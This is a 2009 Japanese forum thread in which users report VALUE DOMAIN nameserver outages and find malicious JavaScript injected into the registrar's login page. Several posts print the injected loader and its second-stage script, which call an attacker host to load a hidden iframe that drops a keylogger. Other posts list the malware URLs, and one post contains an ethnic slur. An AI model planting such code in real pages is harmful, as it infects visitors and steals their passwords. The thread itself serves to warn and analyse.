VALUE DOMAINってどうよ？ part33

1 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:18:47 0] VALUE DOMAIN:バリュードメイン https://www.value-domain.com/ サポート https://www.value-domain.com/support.php sb.xrea.com/forumdisplay.php?f=21 ◆前スレ VALUE DOMAINってどうよ？ part32 pc11.2ch.net/test/read.cgi/hosting/1239851317/ 2 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:19:49 0] 過去スレ VALUE DOMAINってどうよ？ part31 pc11.2ch.net/test/read.cgi/hosting/1233882549/ VALUE DOMAINってどうよ？ part30 pc11.2ch.net/test/read.cgi/hosting/1225092250/ VALUE DOMAINってどうよ？ part29 pc11.2ch.net/test/read.cgi/hosting/1220946385/ VALUE DOMAINってどうよ？ part28 pc11.2ch.net/test/read.cgi/hosting/1214506719/ 3 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:20:45 0] Q. VDが潰れたら俺のドメインどうなるの？ A.https://access.enom.com/ レジストラがeNomの場合はここでドメイン情報を操作できる パスワードはVDの管理画面から取得できるのでメモしておくべし Key Systems管理のドメインの場合は不明、eNomに移管した方が良いかも 補足 VDが健在の場合は定期的にVDに保存されている情報が上書きされる またeNomで設定するにはネームサーバをeNom提供のものへ変更する必要があるので VDのネームサーバを使ってる人は最長48時間程度のタイムラグが生じる可能性がある 詳細 sb.xrea.com/showthread.php?t=4836 Q. 汎用JPの場合はどうなるの？ A. JPNICと傘下のJPRSがちゃんと次の業者を指定してくれる 指定業者にするもよし、好きな業者を選ぶこともできる 実例 jprs.jp/info/termination/20060814.html Q. というかVDって倒産するの？ A. XREAやCOREのサービスが不安定で2chでの評価は下がっているけどサーバは常にほぼ満員 以下のページによるとデジロック名義にしているドメインだけで14万個以上あり 単純に考えてドメイン販売だけで億単位の売り上げがある whois.domaintools.com/xrea.com 4 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:21:31 0] VDが逝く前にしておきたいドメイン防衛（gTLDの場合） ・eNom管理にする 　→VDの管理画面にログインできないときは https://access.enom.com/ から操作可能 ・Whoisのドメイン管理者のメールアドレスは独自ドメイン以外の連絡のつくアドレスにする 　→移管手続きの連絡は、ここで設定されたアドレスで行われる 　→迷惑メールフィルタのあるメールがよい ・いつでも他事業者に移管できるよう、ドメインロックは外しておく 　→ドメインロックがかかっていると移管手続きができないことがある ・認証鍵(Authorization Info)はメモ、あるいはメールで送ってもらう 　→移管手続きには必要。今のうちにVDの管理画面から取得しておく 　参考 　　ttp://sb.xrea.com/showthread.php?t=4836 　　ttp://kazamidori.net/kaoru/web/crisis/ 5 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:22:43 0] 前スレ保管庫 VALUE DOMAINってどうよ？ part32 mimizun.com/search/perl/dattohtml.pl?http://mimizun.com/log/2ch/hosting/pc11.2ch.net/hosting/kako/1233/12338/1239851317.dat 上記で読めないときは www.geocities.jp/mirrorhenkan/url.html?u=http://pc11.2ch.net/test/read.cgi/hosting/1239851317/ 6 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:27:16 0] はじめて正式スレを立てました。やったｗ で、前の続きですが、 www.value-domain.com/login.php 午前4時30分ごろから、上のログインページにログインしようとすると、 ActiveXのインストールが実行しようとされていたのですが、 今はなおってますね。午前6時26分にActivX消えました。 なんだったのでしょうか。 7 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:29:36 0] 実行元を調べると、以下だった↓ ttp://110.165.41.103:888/dir/m.htm そして、そのIPを調べると・・・ safeweb.norton.com/report/show?url=110.165.41.103 ↑ウイルスだーー！クラックされたかと思ったのだが、 なんだったのか・・・ 8 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 06:30:55 0] 症状がこっちで確認できんから何もと言えんな… 自分の環境の問題って訳じゃないよな？ 9 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 06:36:33 0] 環境の問題だけでログインページだけアクティブＸでるのって 初めてだ。そういうこともあるんですね。ノートンクイックスキャンで調べたら Cookieが検出されただけだったけど。 10 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 06:59:16 0] VD・・潰れたら夜逃げってことないよな？ 業務移管とかしないのかな・・。 どうせ止めるんだったら、 優秀な他の業者に業務移管して、さよならとしてほしいけど 11 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 07:58:50 0] >>10 今のうちに>>4を見て、 自分でできることはやっておこうぜ、兄弟!! 12 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 09:28:58 P] 汎用JPは安心を買っていると思えば安いな 13 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 09:58:01 0] ns鯖は今日は7時くらいから調子いいじゃん珍しく 14 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 10:14:31 0] どうせそのうちまた(ry 15 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 10:30:39 0] いつも通り死んでますが？ｗ 16 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 12:56:34 0] 現在、弊社の無料ネームサーバーが正常動作しないというご報告を多数いただいており、最優先業務として、担当部門がネームサーバー側の確認、および、接続回線(上位プロバイダーも含みます)の確認などの緊急対応を行っております。 この不具合のため、 　●独自ドメインへのアクセスが不安定 　●弊社サブドメインのアクセスが不安定 という症状が発生し、その結果、 　●メールが届いたり届かなかったりする 　●サイトにアクセスできたりできなかったりする 　●サーバーに設定しているドメインの設定が解除される 　●その他、サーバー、ドメインの各種不具合が発生する という不安定な状況になっております。 また、直接的には無関係ではございますが、 　●レンタルカウンターの不具合 　●レンタルチャットの不具合 などの報告もいただいております。 現時点における回避策としましては、弊社以外のネームサーバー(転送有ドメインのenom社のネームサーバーも含みます)をご利用可能な場合は、そちらに切り替えていただくことになり、新たなDNS情報が浸透後(約24〜48時間の後)にご利用可能な状態になるものと思われます。 しかしながら、弊社の無料サーバーのみをご利用の場合は、誠に申し訳ございませんが、担当部門による本症状の解決をお待ちいただく形になります。 (特にネームサーバー関係の不具合につきましては、完全に正常化されました場合であっても、おおむね48時間以内に徐々に浸透して安定していく形になり、その間、接続が不安定になる場合もございます) 不安定な状態が続いており、ご不便をおかけしておりますことを改めてお詫び申し上げますと共に、 　━━━━━━━━━━━━ 　━━━━━━━━━━━━ 　●本ご回答から【7日間】改善をお待ちいただく 　●再度のご連絡は【7日経過後も改善しない場合】にいただく 　━━━━━━━━━━━━ 　━━━━━━━━━━━━ という形でのご協力をお願い申し上げます。 17 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 12:57:39 0] ↑ 前スレより転載 障害発生より一ヵ月以上経ちますがその後ご機嫌いかがですか社員さん 18 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 13:13:09 0] 変わりなく過ごしております 19 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 13:24:43 0] 対応出来る技術者を捜してる ↓ とりあえず直させる ↓ 技術者逃亡 ↓ また捜す　←今ここ 20 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 13:28:47 0] とっとと外注して復旧させろよ 21 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 14:01:14 0] 外注は去年の広告鯖ウイルス混入事件で懲りてるんじゃない？ と言っても社内にそれなりの技術者いないなら外注しなきゃ仕方無いんだろうけど。 22 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 14:18:33 0] 障害発生 ↓ 放置 ↓ 放置 ↓ 放置　←今ここ 23 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:32:04 0] もうこりゃ復旧は無理だろ 直せるもんならとっくに直ってるよ 24 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:35:48 P] 食う ↓ 寝る ↓ 食う ↓ 寝る ↓ 100kg超え　←俺今ここ 25 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:39:15 0] >>24 運動しろｗｗ 26 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:41:48 0] >>6 ログインページ(SSL対応)にアクセスしたところ、 「SSLでないページが混在しています」のメッセージが出たのでおかしいなと思ったら、 ソースの326行目あたり、パスワード入力欄の下あたりに不審なJavaScriptが埋め込まれてるな Googleキャッシュ(2009年7月3日 15:38:39 GMT)では上記のJavaScriptは存在しない 実際にウイルスかどうかは確認していないが、見た感じのソースは限りなくウイルス臭い 27 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:45:20 0] ガチ末期ですか？ 28 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 16:27:52 0] なんかサポ板もバグってるみたいで収集つかなくなってるね 29 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:22:28 0] >>6 ttp://1856317799:888/s.js のことかな 確かにパスーワード入力欄の下に埋め込まれてる 1856317799のIPアドレスは110.165.41.103 >>7 のIPと一致するけど、 正常なスクリプトか、ウイルスか、パス抜きか・・・ なんかよく分からんが、ログインするのはヤメとくか 30 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:29:50 0] なんだかなあ・・・ あっちもこっちもボロが出てるなぁ・・・ 31 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:31:42 0] >>29 これか・・・ <ＳＣＲＩＰＴ ＬＡＮＧＵＡＧＥ＝"ＪＡＶＡＳＣＲＩＰＴ">     ｖａｒ ｊｓ ＝ ｄｏｃｕｍｅｎｔ.ｃｒｅａｔｅＥｌｅｍｅｎｔ（"ｓｃｒｉｐｔ"）；     ｊｓ.ｓｒｃ ＝ "ｈｔｔｐ：//１８５６３１７７９９：８８８/ｓ.ｊｓ"；     ｔｒｙ ｛ｄｏｃｕｍｅｎｔ.ｇｅｔＥｌｅｍｅｎｔｓＢｙＴａｇＮａｍｅ（'ｈｅａｄ'）［０］.ａｐｐｅｎｄＣｈｉｌｄ（ｊｓ）；｝     ｃａｔｃｈ（ｅｘｐ）｛｝     ｊｓ ＝ ｎｕｌｌ； </ＳＣＲＩＰＴ> さっきログインしてしまった・・・orz 32 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:41:57 0] s.jsの中身 ／＊ｄｓａｄａｓｄａｄａｓｄａｓｄａｓｄａｓ＊／ ｉｆ（ｄｏｃｕｍｅｎｔ．ｃｏｏｋｉｅ．ｉｎｄｅｘＯｆ（”Ｏ＝”）＝＝−１） ｛ 　　　　ｖａｒ　ｊｓ　＝　ｄｏｃｕｍｅｎｔ．ｃｒｅａｔｅＥｌｅｍｅｎｔ（’ｉｆｒａｍｅ’）； 　　　　ｊｓ．ｓｒｃ　＝　”ｈｔｔｐ：￥／￥／０ｘ６ＥＡ５２９６７：８８８／ｄｉｒ／ｓｈｏｗ．ｐｈｐ”； 　　　　ｊｓ．ｗｉｄｔｈ＝０； 　　　　ｊｓ．ｈｅｉｇｈｔ＝０； 　　　　ｔｒｙ　｛ｄｏｃｕｍｅｎｔ．ｇｅｔＥｌｅｍｅｎｔｓＢｙＴａｇＮａｍｅ（’ｈｅａｄ’）［０］．ａｐｐｅｎｄＣｈｉｌｄ（ｊｓ）；｝ 　　　　ｃａｔｃｈ（ｅｘｐ）｛｝ 　　　　ｊｓ　＝　ｎｕｌｌ； ｖａｒ　ｅｘｐｉｒｅｓ＝ｎｅｗ　Ｄａｔｅ（）； ｅｘｐｉｒｅｓ．ｓｅｔＴｉｍｅ（ｅｘｐｉｒｅｓ．ｇｅｔＴｉｍｅ（）＋２４＊６０＊６０＊１０００）； ｄｏｃｕｍｅｎｔ．ｃｏｏｋｉｅ＝”Ｏ＝Ｙｅｓ；ｐａｔｈ＝／；ｅｘｐｉｒｅｓ＝”＋ｅｘｐｉｒｅｓ．ｔｏＧＭＴＳｔｒｉｎｇ（）； ｝／＊ｄａｓｄａｄａｄｓａｄａｓｄａｓ＊／ 33 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:44:36 0] 何これpass抜きか何か？ 34 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:45:36 0] safeweb.norton.com/report/show?name=110.165.41.103 Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。 見つかった脅威の合計: 8 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/d6.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/en.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/d7.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/d9.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/fd.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/wa.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/yg.dll 脅威名: Bloodhound.Exploit.193 場所: tp://110.165.41.103:888/swf/ia115-2.swf 35 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:51:16 0] このセキュリティの甘さは何なんだお？ 36 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:53:58 0] 完全に投げ出したか 37 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:22 P] 俺のガマン汁もそろそろ限界だ。 38 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:57 0] これは www.value-domain.com/ が乗っ取られたと解釈した方がいいのか？ 39 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:05:00 0] wikiwikiもやられてるみたいだな。GENO系統だろ。 ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね？ 40 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:01 0] どうりで今日はデジロ社員が2ch工作してない訳だｗ 多分今頃、事務所は修羅場なんだろｗ 41 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:59 0] かんべんしてよマジで IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない 42 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:13:29 0] 大丈夫かよデジロ 43 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:16:25 0] >>40 多分、社員はまだ気がついていないんじゃないかな javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね 44 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:27 0] もしパス抜かれてたら、パス変更したら大丈夫なの？ 45 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:31 P] そもそも書き換えられたことが問題。 46 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:47 0] 一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考 差し替えたら取れなくなる資料は今のうちに取っておいて、 あとは原因追究、恒久的対応だろ 47 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:49 0] 初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの？ あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの？ 教えてエロい人。 48 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 18:39:08 0] とりあえず、マスコミに報告だ。 そうでもしなきゃ、隠蔽するだろ、ここ。 49 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:40:48 0] >>47 1856317799　=　0x6EA52967　=　110.165.41.0 50 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:41:30 0] すまん、 1856317799 = 0x6EA52967 = 110.165.41.103 か 51 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:52:04 0] 0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。 ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったｗ スレ汚し失礼しました。 52 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:57:31 0] こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では まず使われないからな 53 名前：sage [2009/07/06(月) 19:00:14 0] >>51 なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。 54 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:01:56 0] 0xではじまるのは16進数 55 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:02:50 0] ところで、ns1-3.value-domain.com がひけないんだが、俺だけ？ 56 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 19:04:48 0] 110.165.32.0/19は香港のアドレスブロックか 相変わらず中国人はクソ以下だな 57 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:05:58 0] ns2が引けないな。1と3は引ける 58 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:08:30 0] >>55 そんなのもう5月の終わりからだぞｗ 59 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:09:29 0] ネームサーバも酷いな、とりあえずenomにして あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく 60 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:11:26 0] しっかし、これだけ対応悪いと、 過去に隠蔽された情報漏洩やハッキング被害がｲﾊﾟｰｲあるのでは？と疑いたくなる。 61 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 19:13:01 0] とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。 GIGAZINE、期待してるよ。 62 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:14:05 0] >>51 1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103 0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる： 0x6EA52967 → 0x6E 0xA5 0x29 0x67 0x6E = 110 0xA5 = 165 0X29 = 41 0x67 = 103 63 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:17:27 0] >>62 もういいって ping 1856317799 とでも打てばすぐに分かることだし 64 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:19:21 0] 惰性のみでM調教受け続けてきましたがさすがにもう無理です。 ごめんなさいドSデジロご主人様。 65 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:20:43 0] ・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。 66 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:24:00 0] >>65 つ>>16 先月1日あたりからアナウンスも一切無くずっと放置だよ 67 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:28:58 P] とりあえず垢のパスは変えた方がいいのかな？どうなのかな？ 68 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:31:50 0] おちおちコンパネにログインすらできんってどうよ 移管もできねーじゃん 69 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:32:13 0] >>66 これって死にッぱなし・・・じゃないよね？ だったらHPもメールも動かなくなるわけだし。 70 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:35:33 0] >>69 orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。 71 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:44:32 P] 知らずにログインしてた… 念のためJavaSciprt無効化してからログインしてパスワード変更したよ。 72 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:57:50 0] >>67 コンパネのパスを抜かれるって事はxreaのログイン情報から メールのパスワードまで全部つながって見えるって事だから とりあえず、JavaSciprtをoffにしてパスワードを変更した。 73 名前：72 mailto:sage [2009/07/06(月) 20:04:17 0] 追加。 よく考えたらxreaどころじゃねぇ、 抜かれたパスワードからさらに他のパスワードに換えられたら、 こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。 ログイン履歴をメモしておかないとな。 自分が寝ているハズの時間のログイン記録があるかもよ。 74 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:07:31 0] わざわざ今ログインしてる人って頭ＸＸＸＸＸ 75 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:15:16 0] 改ざんされてる割には あまり騒いでないな 76 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:27:01 0] JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では？ つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。 今はログインせずに、アナウンスを待つよりほかない。 77 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:29:44 0] 他社で取得したco.jpドメイン運用しているんだけど、 NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと？ 78 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:31:10 0] まさか本当にGENO系？ それならvalue-domain.comのFTPパス抜かれたってことか 最悪だ 79 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:36:44 0] GENO系かどうかはわからないけど、login.phpが改竄されたってことは 少なくともftpの垢パスが漏れていると言う事実は変わらない。 もしかしたらもっと上位の垢パスの可能性だってある。 80 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:58:10 0] ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか これ、どう処理するんだろ 適当にパスワード変更してください、って告知して、また１００日無料期間追加程度で終わるのかな 81 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 21:49:42 0] やばいよよばいよ 82 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 21:52:07 0] まだ直ってないの? 83 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:12:14 0] >>32のs.jsって本当にあるね…… 俺、javascriptってよくわかんないんだけど、 ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと？ 84 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:14:53 0] この先いったいどうなることやら 85 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:20:19 P] www.value-domain.com/login.php <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> https://www.value-domain.com/login.php <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> 当たり前だけ両方あるな 86 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:27:49 P] s.jsの中身 /*dsadasdadasdasdasdas*/ if(document.cookie.indexOf("O=")==-1) { var js = document.createElement('iframe'); js.src = "http:\/\/0x6EA52967:888/dir/show.php"; js.width=0; js.height=0; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie="O=Yes;path=/;expires="+expires.toGMTString(); }/*dasdadadsadasdas*/ http:\/\/0x6EA52967:888/dir/show.php ↓ 110.135.41.103/dir/show.php 87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:31:58 0] To: 85-86 >>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか, 考えてみよう. 88 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:33:17 0] >>85 >>86 既出 上で書いてあることをいちいち書き込まなくてよろしい しかも香港鯖にリンクを貼るなや 89 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:40:35 0] ウィルスURLを張るのは普通に通報対象です 90 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:46:18 0] で、肝心のデジロは把握してるの？ 91 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:49:31 0] 把握していないのでは？ ＜script＞〜＜/script＞を削除するくらい一瞬で終わる 92 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:51:23 0] 誰かが魚拓とってくれたみたいだ。 ttp://s03.megalodon.jp/2009-0706-1843-51/https://www.value-domain.com/login.php 93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:52:08 0] 試しに問題のURLを確認してみた 問題の飛ばされる先のｍ.ｈｔｍに、ノーガードで突っ込んでみると、 XPだと、 ドライブ:/Documents and Settings/ユーザ名/Application Data のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか 詳細は不明 何かがやられているのは確かだ 実験するのは自己責任で 94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:56:05 0] つーことは、ログインするとパスが抜かれるのではなく、 ログインページを開くだけで感染するってこと？ 95 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:59:41 0] >>93に追記 ログをおったら、Keyloggerを検知した やはりパスワード抜きで確定だと思う 96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:06:19 0] 要は　javascript 実行させない環境で見れば 問題ないのかな 普段はFireFox+ NoScriptで普段はjavascript 実行させないようにしてるけど・・・ 97 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:07:53 0] >>95に追記 カスペルスキーを実行させながら再実験するとこんな感じになった そんなスクリーンショット ttp://www.dotup.org/uploda/www.dotup.org209036.jpg これは酷い 98 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:12:33 0] login.phpに＜script＞を埋め込むことができるなら、 login.phpのログイン時の処理にも細工がしてある可能性もある JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難 99 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:13:36 P] >>93 踏んだけどなかったなぁ そもそもそのURL鯖落ちしてないか？ 100 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:16:19 0] ttps://www.value-domain.com/login.php にアクセスするだけで感染？ 101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:19:14 0] >>98 確かにそうだね しかしそろそろドメインの更新できないと困る・・・ しかも他ではあんまり扱ってないドメインだから 移管するのも面倒だし 102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:22:45 0] Windows以外のOSかVistaでアクセスした方がいいね 103 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:23:20 0] >>93 >>95 >>97だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど ｍ．ｈｔｍのほうはこんな感じ、ｓｈｏｗ．ｐｈｐのほうは何も吐き出してこないから、何やってるか全く不明。 正直、なんともいえんけど、 とりあえず、実験に使ったPCは念を入れて、リカバリ中 104 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:26:20 0] >>101 ccTLDは基本的に移管できないよ 認証鍵があるtvは移管できるかもしれないけど 105 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:27:24 0] >>102 HDDはずしてubuntuをCD-ROMブートで使うのが セキュリティ上いいのかしら(´・ω・｀) Winのセキュリティソフトもすぐ対応してくれないと 意味ないし・・・ 106 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:28:31 0] avastは検出してくれないなぁ〜 このキーロガーは、VDのパスを狙っているのではなく、 VD利用者が日頃入力するパスを狙ってるってことかな？ 107 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:35:44 0] GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。 108 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:42:28 0] >>102 phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う ログインすることそれ自体が危険 109 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:47:00 O] 夕方ログインした もう、手遅れだろうから 全部諦める事にしたよ 大規模な改ざんが来そうだね 110 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:04:41 0] ログイン出来なきゃサポにも連絡できねえ。 問題が大きくなる前に対処しないとやばいんじゃね？ 111 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:16:30 0] 今は消えてるみたい。やっと気づいたかな? でも、相変わらず報告なしだなぁ 112 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:20:36 0] 今北 何？ログインページにロガー仕込まれたの？マジで？？ 今確認する分にはヘンなスクリプトは入ってなさげだけど… マジで仕込まれていたなら事は重大だなあ デジロは早急に今判っていることだけでもアナウンスすべき 113 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:25:57 0] 本当だ、いつのまにかなくなってる でも、>>92で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな 114 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 